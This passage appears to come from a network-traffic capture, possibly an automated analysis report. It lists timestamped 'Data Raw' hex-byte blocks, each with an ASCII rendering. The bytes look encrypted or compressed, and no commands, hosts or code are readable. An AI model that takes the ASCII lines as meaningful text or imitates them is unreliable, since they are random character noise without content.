fe 64 6c f8 c7 84 d5 aa 28 3e
                                                Data Ascii: /v%T?i:BYK1L1|tSJBLr:ELs0X"EAB;csjHjk9j<n[XS+4eHb|!^71Gtk=6-hPW}8<Ck[ZA.H9RzOH0 coxP_7p4QfUKOdl(>
                                                2022-05-12 15:08:08 UTC45INData Raw: 87 54 71 47 c2 96 f1 a3 9f 40 dd a7 ee 61 01 f0 4f 07 c2 47 5a 73 ca 72 df 08 de 87 96 88 41 cb f1 35 79 0b e9 aa 1f b9 50 4c d1 23 46 de 72 67 fa de 0a bc 4a fa 6d ba dc 54 2b eb f1 d7 89 2b a2 27 a1 9d 87 59 62 36 09 1b d1 71 c6 32 3a 18 76 13 7a 11 c1 5e 80 57 1e 20 91 1d f2 4f f7 88 69 d4 62 09 c8 26 7c 0e 7d aa 44 a6 ac 26 40 b1 5f d2 6c 46 f1 c9 74 f1 f3 dc d6 0d 5d c9 80 6d 75 d4 c2 ad ff 2c b1 9e f9 93 b0 c9 d8 3a 6a f1 5a 1b 1e 6d 6c e8 33 c2 6b 09 8c 6a 27 e5 f1 ce 4f d0 36 7a 9a 45 80 a4 9a 65 38 b2 e2 21 a8 be 55 cb 03 e2 41 3e 44 57 65 64 bb 0f f6 78 5d f4 52 4b c7 75 bb b6 f0 e3 69 84 14 8e 05 61 ab d3 17 61 6b 4c 12 04 73 11 81 2c 07 33 9a e0 20 74 38 7f 2e ed 6b 8a 28 63 bc 01 d4 08 2b 70 6d 32 a2 05 3a bb 4c 5d 8d 54 24 ab c4 88 07 94 cc
                                                Data Ascii: TqG@aOGZsrA5yPL#FrgJmT++'Yb6q2:vz^W Oib&|}D&@_lFt]mu,:jZml3kj'O6zEe8!UA>DWedx]RKuiaakLs,3 t8.k(c+pm2:L]T$
                                                2022-05-12 15:08:08 UTC46INData Raw: 74 82 5a ab 5b 4e 46 c3 9b e3 cf a4 9c 1a 3a 19 6c 79 f5 91 89 52 93 3e 63 2b 84 00 85 00 cd 94 f9 c0 fb 4d e3 fd 1f 14 a6 cb c7 d4 e5 ab 41 ed f7 fe 08 84 d7 2d 0b b2 f4 2b 2d 61 82 f5 30 e4 21 df 51 1c 23 2a d2 d0 79 67 02 30 88 be 94 ee a6 1c 65 da f3 da 8d d1 fb f3 95 64 61 cd 42 f4 99 7a f8 a0 f3 b7 24 31 96 90 5c 90 af f2 af 60 63 e2 f7 db 3c 3a 96 2a b4 bb 2c 6a d0 82 8e 2a fe d1 ff 28 b3 87 59 ab 30 7f d2 be b2 82 9a b9 8e 4a 15 87 4e fe 0c 9d 35 7c 93 09 fa ff 4e 61 f2 1e cd 61 1d 49 e3 1d 6a bc ab 7b d4 2d e4 77 60 f6 e9 e0 4c 93 5d c7 8c 76 64 57 6d b0 ea 4c e3 c9 03 b7 e4 d2 d5 25 e7 14 41 08 1a 45 8c c8 87 c0 b1 3e 0f 5e af 11 2e 58 06 a9 e0 b6 43 aa 15 a4 5c ab 10 76 f3 c9 af 16 22 22 40 27 9d 6c 12 6e 3a 9c e2 b6 93 4c c9 d0 cd 70 1a ef 7e
                                                Data Ascii: tZ[NF:lyR>c+MA-+-a0!Q#*yg0edaBz$1\`c<:*,j*(Y0JN5|NaaIj{-w`L]vdWmL%AE>^.XC\v""@'ln:Lp~
                                                2022-05-12 15:08:08 UTC47INData Raw: ab c8 d4 93 b7 5c fe 6c 26 3b 74 17 91 bb fd 72 56 d5 30 ed 65 e9 d3 b6 83 5f da db c7 6d 81 7f eb d9 60 1e 60 f0 b5 7a 77 56 d0 d2 5b 28 b9 47 e4 15 d2 e8 0d 8e 25 80 52 c8 62 49 84 31 5f 8a c1 e1 7e 6f ec c8 77 a2 20 4f ec c6 27 41 f1 ef da b5 fb 1e 7f 06 c4 af 60 34 0b 26 6b da 5e 52 f8 d7 c2 71 fe d8 ac 54 fd bc 54 35 45 d6 6b da 2d 04 43 89 48 a9 67 e1 09 86 bb 4f 17 de 11 8c 21 5a d4 df be 92 47 d7 da 42 de b1 66 7c b3 7a 45 59 3f 4d 24 bb a5 7a f0 e5 46 46 3c 24 11 ac 98 be 3e 60 21 bc 2c 79 3e ac f1 59 df 13 da 88 4a 3b 55 4f 8b 53 94 a1 a5 fd 71 8b fe 62 ba 41 b4 55 d4 a8 59 f4 39 db 96 41 b3 54 35 d7 16 73 f2 6f 67 dc e3 fd ea d3 68 6e c7 a7 93 1b cf fe 0d 65 0b f0 17 a9 97 d9 08 50 f2 3b b0 7e 70 99 80 bc 8d c3 6b c3 c0 e3 d0 c7 9f 07 35 08 68
                                                Data Ascii: \l&;trV0e_m``zwV[(G%RbI1_~ow O'A`4&k^RqTT5Ek-CHgO!ZGBf|zEY?M$zFF<$>`!,y>YJ;UOSqbAUY9AT5soghneP;~pk5h
                                                2022-05-12 15:08:08 UTC49INData Raw: 75 2b d5 f1 eb 66 0b 98 35 e3 a4 7a 71 09 3d 7a c2 dc 6e d9 32 07 09 41 19 44 68 ee 5f ac 53 0f 16 8b 12 b1 86 f6 82 70 ee 34 1c db 3b 54 e5 67 b5 77 37 e7 0a 47 aa 55 f1 74 61 e4 c3 5c 8f 0b c2 c7 f9 82 e9 9b 5a 52 c9 05 98 9b 6e a3 8d e8 4f a6 d8 1e dd 6c d7 82 18 0a 6c ab ea 0d ea 57 12 93 57 ca cd f5 fc 5e d5 14 6c 9b 42 a0 8a f9 26 44 b4 ca 01 aa be 53 10 49 e2 41 15 57 4d 7a 89 a8 14 f6 78 46 ea ac 4a eb 7f aa bf ea 35 7a 78 0b 87 16 5b ab c2 0c 66 5a b2 13 39 62 00 87 3b dd 24 4c 6f 0f 74 38 79 3f e8 74 4e 3b 78 bc ec cd 17 3b 82 6c 1e ac 07 2b b0 64 34 8c 54 2e 12 d1 97 16 a8 d7 38 04 ca f7 42 af 42 d1 26 f1 09 d6 54 d6 22 4a 31 6d 8c 86 05 8a 35 7c 8e 02 c0 36 0c 42 d3 64 24 b1 a7 74 15 36 f7 d5 0c d9 50 80 bb 4d 77 78 32 32 ef 56 95 83 7c 61 5b
                                                Data Ascii: u+f5zq=zn2ADh_Sp4;Tgw7GUta\ZRnOllWW^lB&DSIAWMzxFJ5zx[fZ9b;$Lot8y?tN;x;l+d4T.8BB&T"J1m5|6Bd$t6PMwx22V|a[
                                                2022-05-12 15:08:08 UTC49INData Raw: db 79 d5 25 dc 96 90 aa 9f 6b f1 3f 6c 4d f6 b1 1f b3 58 54 e9 d7 54 fd 78 67 fe db d3 51 40 c9 48 b8 cb 4c aa c9 34 c2 77 2a 91 3a b0 83 8c 60 06 28 10 ef dc 42 ff 30 2c 0c 4f 59 67 07 39 48 21 5e 1c 31 9b 26 97 5f f9 94 6b cc 67 84 f3 2c 7c 1f 6c 17 60 56 b9 1e 50 b6 6e 44 73 70 e8 cd 6e f3 e7 c3 d6 fc 43 ff 74 7d 52 d8 3c 7b f5 33 a9 9c e6 e7 ad d2 c0 df 04 14 5d 0d 07 6b 6a e0 3b cd 7a 03 9c 44 27 e5 f1 d8 5c fd f9 b3 9b 4f 81 96 c0 68 38 a5 c5 1e 54 bf 7f a9 58 e9 57 ae 7f 5c 7a 5c a2 1f e8 7a 49 ea bd 45 f4 67 54 bc c6 3f 6b 83 11 17 3a ce b4 db 1f 71 5b a3 1c 37 6c fe 86 17 d3 35 46 7b 95 5c 29 7e 3d e2 7f a4 34 6b b3 10 de 18 24 82 92 1f 80 7a 3f 60 e6 36 8c 55 06 ac d2 97 1c af 82 3a 04 15 ef cf a8 4e d1 27 e2 02 c7 5f c0 25 62 20 6d 8a 8c a7 9b
                                                Data Ascii: y%k?lMXTTxgQ@HL4w*:`(B0,OYg9H!^1&_kg,|l`VPnDspnCt}R<{3]kj;zD'\Oh8TXW\z\zIEgT?k:q[7l5F{\)~=4k$z?`6U:N'_%b m
                                                2022-05-12 15:08:08 UTC51INData Raw: 80 3b 78 2d 84 0a 85 19 cd 94 f9 e8 d2 54 8c 2a 16 34 a2 5a c2 cc ca ec 40 ed fd f5 1a e7 ea e0 0a b8 ed 40 0d 65 ed 14 19 1e 2b cc 50 1e 30 2a c2 d7 78 6b a4 7f e7 64 93 fd be 10 d7 e3 e2 df e2 3d fa f3 bf 2d 55 03 43 f4 93 a6 26 aa 0a a4 7b 10 cf cd 5c 9a 12 39 7e c5 05 e2 f7 d0 05 29 86 24 a5 a8 29 06 bf 82 94 4c fe df ff 08 f3 dc 73 65 3f 7f b0 e0 7d 89 9a b3 8a 62 41 b5 4a f8 e2 57 35 7c 10 25 e8 ff 5e 7b 92 f1 d4 49 ee 45 90 f1 78 bb 7c dc dd 25 e0 09 36 e7 fa ec 3a 6a a4 c7 86 63 71 23 64 29 ea 46 f0 e4 3f b2 f5 de 92 de e6 14 41 c4 9d 5d e3 1f 8e e0 bf af 0a 46 f3 b3 2c 49 00 ce 2e d8 11 a0 7a 9f 4e af 0b 5b 66 22 ae 10 3b 26 56 21 8b 6d 1e 50 d3 98 6c 07 ef 83 cf bc e4 7b c4 f5 6f fc ac 87 4a 71 d1 70 a1 e0 c9 96 9a 7c 69 c1 f8 13 60 30 95 ec 1f
                                                Data Ascii: ;x-T*4Z@@e+P0*xkd=-UC&{\9~)$)Lse?}bAJW5|%^{IEx|%6:jcq#d)F?A]F,I.zN[f";&V!mPl{oJqp|i`0
                                                2022-05-12 15:08:08 UTC52INData Raw: d4 45 97 42 41 e6 dd 52 57 e1 eb df 7b 3d fd 7b a3 ea 5a 61 0a df 4d b8 e2 b9 e5 15 d2 42 29 4b 24 9b 70 d9 0d 1b 8e 19 f5 80 c8 95 67 63 ec cc 6a b7 a9 e9 fd ff e4 cf 46 f1 13 a6 76 68 ba f9 c7 a9 7b 10 0d 06 81 f0 0d 56 e9 d4 59 7a f9 d8 ad 7d 25 b1 45 33 20 28 6f f2 36 7e 4a a9 ea b8 78 c2 0b 97 22 5b 03 c9 10 de 21 4b d7 cf cd e9 4a c1 c9 b1 de bd 4e e2 a0 7f 5e 4d 24 73 73 96 ae 61 e8 f7 cd 6a 05 b0 10 a6 81 b6 48 76 ac b0 37 74 fb b3 e7 40 f4 02 b5 e9 25 66 51 ed 90 88 8a a7 8a 46 8d 8b f4 c6 a0 4f df 80 5b 1f 7b 74 31 ca 95 f2 a5 3c fd d3 b4 68 f9 de 79 cc ea d7 e1 c1 1f 10 9b a7 99 6f 7d f6 27 61 0e f9 07 b1 9f d1 84 e7 0a 13 25 40 71 93 93 ba 9c c5 7f 3d 98 e8 da 8c 89 23 cb 0a 68 69 f5 92 2d 22 93 3e 68 00 5e 0d ea c6 bf 7b f2 f9 dd 36 ea d7 17
                                                Data Ascii: EBARW{={ZaMB)K$pgcjFvh{VYz}%E3 (o6~Jx"[!KJN^M$ssajHv7t@%fQFO[{t1<hyo}'a%@q=#hi-">h^{6
                                                2022-05-12 15:08:08 UTC53INData Raw: 18 67 09 c7 16 3b 4b b8 71 ee 30 9a 3f 91 5a df 83 79 c6 7b 09 56 3a 7c 1f 67 a6 75 49 a9 1c 43 02 57 dd 67 64 ca 20 75 e0 e2 cb d3 db 5e e6 8a 7a 69 43 13 be f4 32 b0 89 f3 97 b7 c5 4c 06 6b dd 5d af 1c 62 61 ef 00 30 7b 12 99 55 cd cc de d1 5e d3 08 3f 9c 45 8a 8d c7 73 2c 9c 52 03 aa b4 47 8c ad e0 41 32 4e c0 7d 5c a8 15 e5 6d 57 ee ba 48 49 6e ae aa fc b9 2b 8f 0b 86 b4 6b af da 0e f0 ec 3e 42 28 62 01 25 2a d9 37 49 7c 0a 60 2c 67 b0 ba 74 bb 3a 6b ba 01 c9 01 2c 12 7d 18 bb 11 b7 a1 62 2e 9a c8 3f be fa 0f 16 87 dd 29 02 05 64 6e 8e 5f d4 30 6b 21 c7 54 d6 28 9a 3d 6d 8a 9d 2d 9e de 7f 84 2a 91 35 0c 48 a8 68 24 b1 a1 8a 1e 37 e4 91 05 d9 df 9b b0 65 a3 78 32 29 fe 2a 58 ba fc 6b 51 1a 2d de 5a 58 c2 bb 9e 44 52 c0 e2 54 a9 e3 e1 07 6a 3e 5b fd a3
                                                Data Ascii: g;Kq0?Zy{V:|guICWgd u^ziC2Lk]ba0{U^?Es,RGA2N}\mWHIn+k>B(b%*7I|`,gt:k,}b.?)dn_0k!T(=m-*5Hh$7ex2)*XkQ-ZXDRTj>[
                                                2022-05-12 15:08:08 UTC54INData Raw: e0 4a 1a 25 f5 e2 d0 92 e1 bb ca 4b db c5 f0 51 ff 99 6b f3 bf 43 76 7c 35 b1 93 55 82 ce ed 6f fc 48 ca 01 da 2f 23 98 79 b6 a3 2b 17 f8 9d 91 d4 ff fd ec 0b fa cb a7 f4 26 a5 cf 40 f0 ac 9a b3 8b 6e 45 a5 5d f3 63 46 3e 63 82 db e9 c2 41 03 c0 19 d5 4f f7 4f fc 07 6a b0 76 c0 df 32 e8 98 65 cb fc cd d1 a4 a9 d4 87 70 66 5b af 18 14 4d cf e8 16 0e e4 d8 fd 14 d6 07 40 d5 89 4e 93 e4 71 e1 99 af 08 31 81 6a 2d 4f 1b c1 42 44 42 a0 70 8a 70 b8 11 5e 18 c2 b0 2a cf 34 7d 21 8b 13 07 47 c2 9a f3 b8 ef aa cf bc e4 6f 21 fc 75 f9 d2 60 54 5b 25 78 e2 01 d9 91 8a cf ad ca f1 39 79 12 e9 ba 1f b9 40 4c e2 23 46 de 71 4e 18 c4 dc af 5e f0 56 a2 c7 45 31 ef f3 3d 76 06 9e 3b a5 8f 85 66 df a6 66 0d dc 6e d5 3e 3f 0b 6c 08 74 0c 24 a1 ad 75 1a 27 89 31 85 5d fc 82
                                                Data Ascii: J%KQkCv|5UoH/#y+&@nE]cF>cAOOjv2epf[M@Nq1j-OBDBpp^*4}!Go!u`T[%x9y@L#FqN^VE1=v;ffn>?lt$u'1]
                                                2022-05-12 15:08:08 UTC56INData Raw: 84 61 a3 67 67 a0 74 a5 a5 73 36 10 2c 04 f0 0c 50 fc c2 d2 ed fe c7 9c 66 ff b8 6d 3d 50 c7 68 9d 5e 04 43 89 cc 80 49 f3 02 97 a1 5c 1b fa c1 dc 5a 5f d4 cc b7 90 43 d7 de d6 e4 a2 5f ed a2 72 de 45 34 73 b1 94 ae 6d f2 7f f3 6e 2d 25 7e 51 8a bb 40 4a 30 b4 20 a2 f3 a8 f1 59 e2 1d 45 37 17 bc 5d 67 87 8c 9d b6 a4 ba ef 8b fe 6e 99 6b c7 84 df c7 31 e7 30 c0 b9 56 a2 3d 8b 2f 17 79 f4 de 92 cc ea db cb fa a1 01 9a a7 82 16 09 c5 7b 67 70 f5 17 b5 93 ca 01 46 0f 31 cb 60 60 9e 91 b6 1c d0 6d c5 b3 e7 df a0 98 1a 31 84 47 6f e4 95 ce 53 92 3e 63 0e 84 06 fd 1a df 9e e2 f3 c6 47 6d 4a 25 ec a0 63 c0 d7 a5 32 47 82 94 fd 19 82 90 c3 0a b2 f4 2b 7e 60 82 f5 3e 18 37 d9 38 f7 36 3b cc ae 90 6e 2a c2 ae 95 cd ec b3 07 3a a3 f1 a1 88 d0 fb f7 a6 29 2c fd 4e df
                                                Data Ascii: aggts6,Pfm=Ph^CI\Z_C_rE4smn-%~Q@J0 YE7]gnk10V=/y{gpF1``m1GoS>cGmJ%c2G+~`>786;n*:),N
                                                2022-05-12 15:08:08 UTC57INData Raw: 99 99 a0 d2 c4 c6 10 d4 5d 0d 09 bc 7f e0 3b c7 7a 03 96 40 27 e5 f1 c5 5c ae 16 b3 9b 41 88 f7 da 66 38 b0 c2 15 a9 96 8d a5 49 e8 5f 27 52 4d 6b 59 b6 ea f7 45 54 e8 ae 31 e2 7e aa b9 e9 e3 07 86 0a 87 12 65 a2 d1 09 7e 4a b7 08 d6 63 2c 80 3d cb 15 00 71 1c 71 38 6f 38 f1 8a ba 17 7d aa 1d d5 04 3e 8e 7d 1b b3 0e d5 b1 48 30 84 7e 31 b2 c1 92 16 96 d2 24 fa 12 d8 48 ac 48 ed 98 0f f6 29 49 c5 27 4a 20 68 9c 78 04 a6 dd 68 9d 07 31 24 09 5d d7 9a 25 9d b8 5f 10 0f 97 1b f6 26 d6 83 84 89 0c 87 cd 2b d3 45 91 a8 cc 6d 5b 68 3e fb 72 ed c2 bb 85 5f 55 c7 f2 f6 aa e3 eb d9 7b 35 6e f4 5d eb 77 78 c3 a5 46 b3 91 52 ec 61 d4 38 01 95 33 93 6e f4 33 4b 8e 1f e9 07 c6 eb 0a 62 f8 dc 78 99 bf 5e eb dd 08 2c 46 f7 0a cc 98 6c ac 0d c8 ba 79 2f 17 2e 6e ff 12 5a
                                                Data Ascii: ];z@'\Af8I_'RMkYET1~e~Jc,=qq8o8}>}H0~1$HH)I'J hxh1$]%_&+Em[h>r_U{5n]wxFRa83n3Kbx^,Fly/.nZ
                                                2022-05-12 15:08:08 UTC58INData Raw: 38 6b f0 d4 7c 83 90 9b 8b 60 5a 8f d2 e5 70 50 35 6d 9e 3b 16 ef 66 58 f0 1e cc 4f f3 c4 e4 1b 79 ba 65 d4 c5 28 f2 70 e8 b6 fa e6 54 19 b5 c2 98 58 35 51 b0 22 c2 4d e1 e1 24 2b fb d1 ee 0c e7 05 4c ce 66 44 a0 ec 9e e6 a3 b8 18 d3 9b 6b 2d 48 06 ce 3b ae cf f1 7a 95 5c 09 12 4a 21 8b ae 10 3b 1d 50 32 8c 76 86 5a d1 9b e2 a1 87 4f 30 bd c2 73 0d fc 79 f9 d2 6c 54 7b 25 78 e2 0f e3 93 a8 79 49 34 0e 39 12 35 fa b1 04 82 01 51 de ca 47 f2 72 74 d9 c7 de af 4b 98 4b a8 c7 50 10 f0 ee c3 6c 1a 8a 2a fe 8c 8c 71 93 37 09 00 df 15 dd 20 21 1c 63 67 b9 06 3f 55 ae 22 12 30 9a 31 9c 21 21 83 7a cc 7f 65 d5 3c 7c 1b 71 da a6 59 ad 00 45 db 48 d8 73 74 fa bd ac e1 e8 c9 c5 88 52 e4 8a 78 11 25 15 be fe 30 b5 8e 6c 24 ce 08 c1 c4 61 d7 82 1e 28 4e 58 fb 28 c8 71
                                                Data Ascii: 8k|`ZpP5m;fXOye(pTX5Q"M$+LfDk-H;z\J!;P2vZO0sylT{%xyI495QGrtKKPl*q7 !cg?U"01!!ze<|qYEHstRx%0l$a(NX(q
                                                2022-05-12 15:08:08 UTC60INData Raw: cd de cf bc 46 fc 4d 7b 63 44 1a 57 b6 97 a4 eb cc f2 dc 6a 34 28 11 ae 90 45 4b 40 26 94 7d 75 e0 a6 fc 5d f3 1c d6 7e 24 4a 44 31 b9 8e 9d b4 8a ec 8c 8b f4 5d c6 48 c7 84 cb a4 53 ef 27 34 9e 7c b6 23 e8 d7 1e 67 00 b0 47 c3 94 e9 ec c2 65 16 b2 aa 91 11 19 e9 2e 69 0b f8 0c 4b 96 f5 0d 78 54 3a e0 46 6a 99 80 b4 94 3d 68 ef 80 9c ea a1 9e 0f 1d 3a 6a 6f e2 ea 96 a5 93 3a 41 0e 95 0c e0 4c f4 95 f3 fd cd 40 e3 f5 0b ca a9 67 cf fc ec 35 41 eb fc e0 15 88 b0 f6 f4 b3 d2 46 0b 6c 82 f7 07 17 df de 7b 0d 1c 3e fe 93 96 90 d5 cf a2 be 89 cd b0 1b 83 fa f3 da 12 d1 fb e2 9d 2f 39 ee 44 ff ea a5 f9 a0 09 82 7b 31 ac 93 5c 9c 66 d3 78 ed 48 ca fa d9 2f 2f af ed a5 a8 21 69 10 83 8e 20 f8 f9 f1 0b f3 da 0f 50 30 7f dc be 72 80 9a b5 a2 b7 5a 85 44 97 80 56 35
                                                Data Ascii: FM{cDWj4(EK@&}u]~$JD1]HS'4|#gGe.iKxT:Fj=h:jo:AL@g5AFl{>/9D{1\fxH//!i P0rZDV5
                                                2022-05-12 15:08:08 UTC61INData Raw: 49 eb 79 82 9e ea 35 70 e0 e8 86 16 70 ac ea 42 7d 5b b4 3b 60 61 00 81 13 ff 24 4c 67 27 3b 3b 7e 3b c0 57 bb 3b 72 d3 f3 ce 17 31 89 44 4e af 07 2d 98 2c 35 8c 52 06 9a d2 97 1c af 86 3b 04 15 dc 61 af 4e db 49 12 08 d6 5e d1 0a 18 32 6d 8c ae 4d 89 de 79 a6 20 31 35 06 6a 8f 67 24 b7 92 57 15 37 ee 8a ea d8 df 8a bc 65 a6 7b 32 25 d1 0d 92 bb fa 49 79 c4 3d f1 5a 20 c1 bb 92 61 65 ca ca 70 c6 00 ea d9 60 3f 59 ab a0 ea 5d 61 89 dd 4d b4 b9 74 e4 15 d2 10 56 8d 25 9d 52 ff 62 49 84 76 1c 8b c1 e1 0d 4b b4 cb 6c b7 0f 16 e8 d7 26 e7 64 f7 00 a9 4f 34 af 07 c2 8d 50 3c 1a 24 10 11 0c 50 f2 d6 fd a6 fa d8 aa 7d a6 b3 45 3f 7b e5 6e f2 36 2c 18 80 ea be 43 d1 02 97 ba 34 e0 c8 9c d4 26 72 89 cf b3 85 62 89 ce de c9 94 6c e4 b3 70 67 15 31 5b b2 bf 8d 6b fb
                                                Data Ascii: Iy5ppB}[;`a$Lg';;~;W;r1DN-,5R;aNI^2mMy 15jg$W7e{2%Iy=Z aep`?Y]aMtV%RbIvKl&dO4P<$P}E?{n6,C4&rblpg1[k
                                                2022-05-12 15:08:08 UTC62INData Raw: 1f 2f 9b e6 f3 f8 33 52 ea b4 2a 9e 2a d2 c8 8f ea 9f a0 0d 45 ac 6f 2d 9b 0b c6 2d 12 43 a0 6b 97 75 f8 1b 5e 0f c2 dc 05 33 35 5b 3a 8b 13 44 46 c2 96 f1 be 96 4a c3 84 46 71 1a ef 6f f7 d2 66 d1 7c d2 51 f5 0d c8 9c bd a5 8f 44 f0 3f 66 30 89 66 1e a8 4d 40 f0 03 55 d7 50 5b f1 c4 d6 bc 49 cd 6b a9 c7 5e e7 83 ef c3 77 3b 88 2e cc 5d 8d 71 0f 1a 0c 29 b9 6f d3 21 5f 2a 67 08 6f 14 3b 21 9e 59 1c 3b 89 32 e7 7c f7 82 70 d5 78 08 ca 3b 13 cd 67 b5 77 4f 77 19 48 b3 4f e1 40 71 e2 d2 65 e6 f9 ca ef 97 5f e5 8c 13 aa cf 14 b8 e7 37 b2 8b f3 9a 89 b7 c3 c4 6d b2 88 0c 0d 60 66 fc 39 c4 6b 1b bb 3b da e4 db bd 8a d4 1e b4 88 40 9b 89 fb 00 3b b4 cc 6c bc bc 53 ae 58 e7 69 5c 54 4d 7c 33 be 16 f6 63 26 c6 d8 5c 66 50 aa bd eb 26 70 86 23 ee 15 7a ad ad cd 7e
                                                Data Ascii: /3R**Eo--Cku^35[:DFJFqof|QD?f0fM@UP[Ik^w;.]q)o!_*go;!Y;2|px;gwOwHO@qe_7m`f9k;@;lSXi\TM|3c&\fP&p#z~
                                                2022-05-12 15:08:08 UTC63INData Raw: 84 c4 ad 4c ed ce cb b3 41 bc 13 87 d4 16 7f 91 70 6b cd e0 fd cd dd 6a 12 9f a7 82 14 08 08 26 49 00 f2 3e 8c 97 d9 00 7c 46 27 f3 45 71 84 85 a3 81 3d 68 ef 93 eb cb 76 93 14 38 1b 6d 6f f5 91 bc 5a 92 12 6c 3e 98 12 f9 c9 cc 85 f6 e6 dc b2 e2 d1 02 32 a0 63 aa d7 a5 32 69 ce f7 fd 13 e7 e3 e0 0a b8 e1 48 0f 65 82 ee 1d 01 28 21 56 23 3e 2a c2 c8 f3 63 35 c2 9b bb 92 ec b1 04 06 07 f2 f6 87 a2 ac f3 b5 2e 10 f1 52 e7 9c 7a e9 a5 1a 76 7c 35 b4 96 5e b2 74 e6 79 eb 64 c1 f7 da 25 46 dc 38 a5 a2 31 15 f6 82 9f 2f e6 2f fe 24 fa af 26 65 31 75 d2 8f 6e 86 9a a2 8f 7d 57 7b 4f d4 68 5e 24 78 17 92 da 49 55 7e f2 1d d5 58 e1 57 1d 1a 55 bd 5d 3a cb 24 f7 63 64 f6 ff f0 ab ba 88 c4 9b 63 72 50 a1 2d f5 5c 1d e0 02 b5 cf dd c5 b7 19 eb b4 d3 b2 5b 8e d3 bf e4
                                                Data Ascii: LApkj&I>|F'Eq=hv8moZl>2c2iHe(!V#>*c5.Rzv|5^tyd%F81//$&e1un}W{Oh^$xIU~XWU]:$cdcrP-\[
                                                2022-05-12 15:08:08 UTC65INData Raw: f3 95 16 8d 09 37 21 3b d9 42 af 44 c2 2c d9 27 d6 54 dc fc 4a 20 69 a2 f7 04 8a d8 10 af 00 31 3f d2 4d f9 4c 09 b1 ba 7e 06 3c cc cb 09 d9 d5 5e bb 5c f6 50 b6 22 f9 43 fe 9a fe 61 51 1a 32 de 5a 58 c2 bb 9e 5a 4a e2 e4 7a a9 e9 35 d9 7b 3c 59 6c a2 ea 5d 26 e0 dc 4d b8 4f 5a cc 38 d8 38 0b a6 0b 9b 7a d6 bc 49 9f 1d d7 03 c0 eb 0c 0c cd ca 6c bb f9 51 ce ff 0d cf 46 fd 13 ae 4f 43 ac 07 ce 7b 73 2d 1e 06 28 f3 0d 56 97 f0 d7 fc f3 06 a3 70 c6 9d 45 39 59 d4 60 da 12 04 43 89 34 b8 7a f6 2a e5 b1 5b 05 a6 bd dc 21 50 0b c3 96 ab 67 c1 cd d4 dc b3 66 ca b3 7a 45 96 32 4a b0 bf ca 6a fb f5 b3 4f 2f 24 1b 78 84 9e 62 41 21 bc 3d 67 f0 88 ce 51 f3 1e 15 80 34 62 7d 21 80 8f 9b df 83 d7 8c 81 20 6b 94 60 ea 84 d5 a2 40 f6 18 e4 9f 50 be e5 e4 c6 12 51 88 b0
                                                Data Ascii: 7!;BD,'TJ i1?ML~<^\P"CaQ2ZXZJz5{<Yl]&MOZ88zIlQFOC{s-(VpE9Y`C4z*[!PgfzE2JjO/$xbA!=gQ4b}! k`@PQ
                                                2022-05-12 15:08:08 UTC65INData Raw: aa 16 7a a1 d1 2c 56 75 b2 13 22 bc 00 96 3f f5 48 4d 6d 09 1b 19 7c 3d e2 aa b4 1e 50 91 10 cf 1d 28 af 44 30 ac 07 21 6e 64 27 88 7c 5e b9 d2 91 79 a6 d5 38 0e cd fb 67 87 63 d1 26 fb 1a f4 7c f8 22 4a 3b b3 8a 97 01 a2 84 7e 8e 04 5e 14 0e 42 d6 ba 2b 94 92 59 15 37 ee f6 2a f1 f1 80 bb 47 2c 78 23 27 d1 2c 90 bb fa 0e 7a c6 3d f1 ac 7a e7 93 b9 49 46 c0 d9 5e 81 cd eb d9 60 e6 71 ec a7 c2 dc 48 c1 d8 22 93 93 56 ee cb d7 1d 29 a3 25 9b 70 cf 47 61 a0 19 ff 80 1f eb 1b 67 c4 a9 6d b1 21 31 ca d5 20 c5 98 f8 25 8b 4a 6d ac 0d d7 83 5b 12 1a 2e 75 2c 0d 41 fc f9 be fd f9 de c3 74 ec b0 4f e7 5c e2 46 df 3c 04 49 90 cd 90 45 f2 02 9d 6e 5b 12 cd b4 5b 20 5a d3 a3 92 81 4a cb 13 d1 ea 94 63 e4 b3 70 5c 60 1a 75 b4 97 a4 b5 fb e2 d8 46 bf 25 11 a0 e4 9a 48
                                                Data Ascii: z,Vu"?HMm|=P(D0!nd'|^y8gc&|"J;~^B+Y7*G,x#',z=zIF^`qH"V)%pGagm!1 %Jm[.u,AtO\F<IEn[[ ZJcp\`uF%H
                                                2022-05-12 15:08:08 UTC67INData Raw: db 98 45 8c d4 88 e0 b5 b1 0f 5e 9c 76 2d 49 0b c6 2d b7 43 8b 7d 95 5d a5 1a 5e 09 f0 a8 10 31 3a 51 30 8c 61 1a 46 c3 9c e2 b0 80 11 c9 bc ee 7e 1a ef 7e af c4 6b 4b 7e db 79 ce 10 c8 96 91 a0 b7 cb f1 5a 61 39 fa bf 1f a8 4b 20 f1 dd 47 fd 78 76 f1 d9 dc af 40 e5 45 a9 c7 d6 3d f0 ee cd 77 2a 8e ba a4 8c 8c 7e 09 37 09 0c dd 6e d2 21 21 18 67 97 62 07 3f 51 ac 59 1c 9c 9d 35 99 41 f7 82 7a db 7d 1e da 3d 7c 1f 66 09 76 58 ad 04 47 a0 46 13 74 70 e2 dd 74 e0 e8 de c7 f3 5d e5 8a 7c 7e 17 13 be f4 3d a3 8d e2 74 a6 d2 c0 cb 6b dd 5c 10 0d 66 74 fb 28 c2 7a e4 94 5d d9 ea dd d2 5e d1 16 b2 9b 4a 8a 8c d3 7a 38 b4 cb 03 aa be 53 b7 41 e2 41 3a 57 4d 7a 7d a0 14 f6 66 46 ea ac 57 eb 7f ab bd ea 35 7a bf 03 87 16 74 ab c2 0c 40 53 b2 13 24 62 00 87 26 dd 24
                                                Data Ascii: E^v-I-C}]^1:Q0aF~~kK~yZa9K Gxv@E=w*~7n!!gb?QY5Az}=|fvXGFtpt]|~=tk\ft(z]^Jz8SAA:WMz}fFW5zt@S$b&$
                                                2022-05-12 15:08:08 UTC68INData Raw: 37 f6 db 3e 54 fc b1 61 dc ed f9 10 c2 61 0b 4c b9 49 39 3d f4 27 6f 75 e1 17 b5 9d ca 13 41 09 54 f4 41 71 9f a8 31 8e c3 6f ac b4 e0 dc aa 8d 28 27 2a 79 4c f5 81 89 b5 93 3e 63 47 a5 0e ea c6 a3 81 f3 f9 dd 64 c5 ff 17 3e b9 5e a8 c0 a4 34 4b c5 79 fe 19 8e d7 cf 08 b2 f4 57 3c 71 a2 ee 0d 36 30 df 57 05 58 0b c4 c1 63 4a 07 cd ae af be d6 be 62 8e f9 f3 db fc 56 fb f3 b4 37 25 ff 57 9b 8d 7b f8 aa 2b 07 7e 19 a6 ff 73 98 18 ef 6a f0 5d ff e6 cf 07 38 87 38 af c7 1b 04 f3 88 ab 07 fb f7 ee 24 d8 d6 08 e2 31 7f d9 e7 fa 83 9a b2 99 7e 24 94 4f f8 69 44 2b 75 85 a9 b9 ee 4a 71 